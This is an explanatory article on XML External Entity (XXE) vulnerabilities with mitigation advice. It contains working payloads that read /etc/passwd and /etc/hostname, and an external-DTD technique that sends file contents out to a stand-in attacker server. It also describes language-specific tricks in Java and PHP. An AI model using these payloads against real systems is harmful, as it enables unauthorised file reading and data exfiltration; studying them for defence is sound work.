Traps in Processing XML Files: Navigating the Dangers of XXE Vulnerabilities

XML External Entity (XXE) attacks represent one of the most critical security vulnerabilities affecting applications that parse XML files. This article delves into the intricacies of XXE, offering insights into its exploitation, the challenges of securing XML processing, and preventative measures.

XXE vulnerabilities enable attackers to interfere with an application’s process of handling XML data. This could potentially allow unauthorized access to the file system, enable server-side request forgery (SSRF), or manipulate server responses. Understanding the different methods of exploitation is key to defending against these attacks.

Attack Variants and Exploitation Examples

1. Overwriting Values in Tag Content

Attack Mechanics: Assuming an XML document utilizes the text of an element within a response, an attacker can overwrite this value with data from an external entity. This method is often straightforward but requires that the response reflects the manipulated element’s content.

Example:

<!DOCTYPE data [
<!ENTITY s SYSTEM "/etc/passwd">
]>
<data>
  <comment>
    <id>1123&s;</id>
  </comment>
</data>

Response sample:

<response>
  Comment id=1123root:x:0:0:root:/root:/bin/bash...
  completed successfully!
</response>

In this scenario, the parser processes the &s; entity and replaces it with the contents of the /etc/passwd file, which are then echoed back in the application’s response.
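To try the reflected case end to end without touching real system files, here is a minimal Python sketch. It assumes the standard-library xml.sax parser with external general entities switched on deliberately (recent Python versions keep them off by default). The names TextCollector, parse_text and demo, and the temporary secret.txt file, are illustrative and not part of the original example.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data, standing in for an app that echoes input."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(document: bytes, allow_external: bool) -> str:
    """Parse the document and return its concatenated text content."""
    parser = xml.sax.make_parser()
    # The risky switch: True lets the parser resolve SYSTEM entities.
    parser.setFeature(feature_external_ges, allow_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(document))
    return "".join(collector.chunks)


def demo():
    """Return (text from permissive parser, text from restrictive parser)."""
    with tempfile.TemporaryDirectory() as tmp:
        # Hypothetical stand-in for a sensitive file such as /etc/passwd.
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w", encoding="utf-8") as handle:
            handle.write("TOP-SECRET")
        payload = (
            f'<!DOCTYPE data [<!ENTITY s SYSTEM "{secret_path}">]>'
            "<data><comment><id>1123&s;</id></comment></data>"
        ).encode("utf-8")
        return parse_text(payload, True), parse_text(payload, False)
```

With the permissive setting, the text returned by demo() should contain the secret right after the literal id, which mirrors the echoed response above. With the restrictive setting, the entity reference is expected to be skipped.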

2. Assigning Values in a Tag Attribute

Attack Mechanics: Similar to tag content manipulation, but the target is an attribute value. The complication is that the XML specification forbids external entity references inside attribute values, so the direct approach fails. However, attackers can sometimes bypass this restriction with more elaborate DTD (Document Type Definition) declarations.

<!DOCTYPE data [
<!ENTITY s SYSTEM "/etc/passwd">
]>
<data>
  <comment id="1123&s;">
  </comment>
</data>

This is the previous example with the entity reference moved into the ‘id’ attribute of the ‘comment’ tag. At first glance, this should not significantly change the parser’s behavior. However, the XML specification prohibits external entity references within attribute values, so the attack fails when attempted directly. The error returned by the parser might resemble: “The external entity reference is not permitted in an attribute value.”
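The restriction can be reproduced with Python's expat bindings. This is a small sketch under stated assumptions, not the parser that produced the message quoted above: the helper name first_parse_error and the placeholder SYSTEM identifier are made up for illustration, and expat words its error differently.

```python
from xml.parsers import expat

# External entity referenced inside an attribute value (not allowed).
ATTRIBUTE_PAYLOAD = b"""<!DOCTYPE data [
<!ENTITY s SYSTEM "file:///nonexistent-demo-file">
]>
<data>
  <comment id="1123&s;"></comment>
</data>"""

# Same entity referenced in element content, for comparison.
CONTENT_PAYLOAD = b"""<!DOCTYPE data [
<!ENTITY s SYSTEM "file:///nonexistent-demo-file">
]>
<data>
  <comment><id>1123&s;</id></comment>
</data>"""


def first_parse_error(document: bytes):
    """Return expat's error message for the document, or None if it parses."""
    parser = expat.ParserCreate()
    try:
        parser.Parse(document, True)
    except expat.ExpatError as exc:
        return expat.ErrorString(exc.code)
    return None
```

Here no external entity handler is installed, so nothing is ever fetched. The attribute variant is rejected as malformed, while the content variant parses with the reference left unresolved.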

A potential solution would be to use a parameter entity, which in turn defines a classic entity containing the file content, for example:

<!DOCTYPE x [
<!ENTITY % file SYSTEM "/etc/passwd">
<!ENTITY % x "<!ENTITY s '%file;'>">
%x;
]>

In this example, the parameter entity %file; contains the content of the file we want to read, while the parameter entity %x; defines the classic entity &s;, which effectively contains the file content of /etc/passwd, although it itself is not an external entity. In practice, however, this leads to another parser error: “The parameter entity reference ‘%file;’ cannot occur within markup in the internal subset of the DTD.”
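The same kind of check works for this second error. The sketch below again uses Python's expat bindings as an assumed stand-in parser; first_parse_error and the placeholder SYSTEM identifier are hypothetical names, and the exact wording of the message depends on the parser.

```python
from xml.parsers import expat

# A parameter entity referenced inside a declaration in the internal subset.
INTERNAL_SUBSET_PAYLOAD = b"""<!DOCTYPE x [
<!ENTITY % file SYSTEM "file:///nonexistent-demo-file">
<!ENTITY % x "<!ENTITY s '%file;'>">
%x;
]>
<x/>"""


def first_parse_error(document: bytes):
    """Return expat's error message for the document, or None if it parses."""
    parser = expat.ParserCreate()
    try:
        parser.Parse(document, True)
    except expat.ExpatError as exc:
        return expat.ErrorString(exc.code)
    return None
```

The parser rejects the document while reading the declaration of %x;, before any file would be read, so the rejection comes from the document's structure and not from the file being unavailable.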

It turns out that, within the internal DTD subset, a parameter entity cannot be referenced inside another markup declaration. Nevertheless, the XML standard provides an unexpected loophole: this restriction does not apply to external DTDs, so by moving the definition of the entity %x; to an external file, it can contain references to other parameter entities.

<!DOCTYPE data [
<!ENTITY % file SYSTEM "/etc/passwd">
<!ENTITY % external SYSTEM "https://server-attack/example.xml">
%external;
%x;
]>
<data>
  <comment id="1123&s;">
  </comment>
</data>

Where the content of the file at https://server-attack/example.xml is:

<!ENTITY % x "<!ENTITY s '%file;'>">

This example demonstrates an indirect method where an external DTD is used to define entities that are then referenced within attributes.

In the given example, four entities have been defined in total. Here’s a breakdown of each:

  1. Entity %file; contains the content of the file /etc/passwd.
  2. Entity %external; loads the definition of another entity from an external file.
  3. Entity %x; is declared in that external file and, once referenced, defines the classic entity &s;.
  4. Entity &s; holds the content of %file; as its value. Because it is not itself an external entity, the parser accepts it inside an attribute value without raising an error.

3. Lack of Value Rewriting in Responses

Attack Mechanics: Not all server responses involve rewriting input data from the XML. When direct feedback of manipulated data is absent, attackers may instead leverage server-side functionalities or error messages to infer information.

Example:

<!DOCTYPE data [
<!ENTITY % file SYSTEM "/etc/hostname">
<!ENTITY % external SYSTEM "https://attacker-server/example.xml">
%external;
%x; %x2;
]>
<data>
  <comment id="1123">
  </comment>
</data>

Where the content of the file at https://attacker-server/example.xml is:

<!ENTITY % x "<!ENTITY &#x25; x2 SYSTEM 'https://attacker-server/example.xml?file=%file;'>">

Here the file content never appears in the application’s response. Instead, when the parser expands %x2;, it requests a URL on the attacker’s server whose query string carries the content of %file;, so the data leaks out-of-band, for example through the attacker’s access log. Nested parameter entities loaded from an external DTD are what make this information disclosure possible.

In the given example, four entities have been defined. Here’s an explanation of each:

  1. Entity %file; contains the content of the file /etc/hostname.
  2. Entity %external; loads the definition of another entity from an external file.
  3. Entity %x; is a parameter entity declared in that external file; once referenced, it defines the malicious entity %x2;.
  4. Entity %x2; points to a URL that contains the content of %file;, that is, the content of /etc/hostname. Referencing it makes the parser send that content to the attacker’s server.

Even if the server response only indicates success or failure without reflecting any input data, the mere processing of the XML document can reveal information through error logs, network calls, or side effects observed by an attacker.

Language-Specific Features

Different programming languages have specific features that can sometimes simplify the exploitation of vulnerabilities. Here are two examples:

  1. In Java: Instead of specifying a file name (like /etc/passwd), you can specify a directory name (like /etc). This will list the contents of that directory, which is very useful for discovering paths to configuration files of applications.
  2. In PHP: There exists a special type of URL that starts with php://, which allows for reading binary files via XXE by converting the file into Base64. An example URL would be: php://filter/convert.base64-encode/resource=/path/to/file.
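To illustrate why the Base64 step matters, the following Python sketch encodes some made-up binary data the way such a filter would and decodes it again on the receiving side. The sample bytes and the helper name is_base64_alphabet are assumptions for illustration only.

```python
import base64
import string

# Hypothetical file content: NUL bytes and markup characters like these
# would normally break entity expansion inside an XML document.
raw = b"\x00\x01<config secret='a&b'>\xff"

# Roughly what a Base64-encoding filter would hand to the XML parser.
encoded = base64.b64encode(raw).decode("ascii")

BASE64_ALPHABET = set(string.ascii_letters + string.digits + "+/=")


def is_base64_alphabet(text: str) -> bool:
    """True if the text uses only characters from the Base64 alphabet."""
    return all(ch in BASE64_ALPHABET for ch in text)


# The attacker reverses the encoding after receiving the value.
decoded = base64.b64decode(encoded)
```

Because the encoded form contains no angle brackets, ampersands, or control bytes, it can pass through entity expansion unchanged and be decoded afterwards.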

All of the XML vulnerabilities described above stem from the same characteristics of XML libraries. This is not the end of the story, however: new or different data formats based on XML may introduce new vulnerabilities.

Mitigating XXE Vulnerabilities

Prevention of XXE attacks revolves around securing XML parsers and implementing proper input handling:

  • Disable External Entity Loading: Configuring XML parsers to disallow loading of external entities significantly reduces the risk.
  • Whitelist Safe Entities: If external entities are necessary, strictly whitelist those that are safe to use.
  • Security Hardening of XML Parsers: Use secure parsing options provided by most modern XML parsers, such as explicitly disabling DTDs or using APIs that inherently avoid these issues.
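As one possible illustration of the "disable DTDs" option, the Python sketch below refuses any document that declares a DOCTYPE before handing it to the regular parser. It is a minimal sketch using only the standard library. The names DoctypeForbidden and parse_untrusted are hypothetical, and other languages expose equivalent switches under different names.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when an untrusted document contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Entities can only be declared inside a DTD, so refusing the DOCTYPE
    # rules out both internal and external entity tricks.
    raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML from an untrusted source, rejecting any DTD up front."""
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.Parse(data, True)  # raises DoctypeForbidden if a DTD is present
    return ET.fromstring(data)
```

The document is scanned twice here for simplicity. Rejecting the DOCTYPE outright is a blunt but easy-to-audit choice when the application never needs DTDs.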
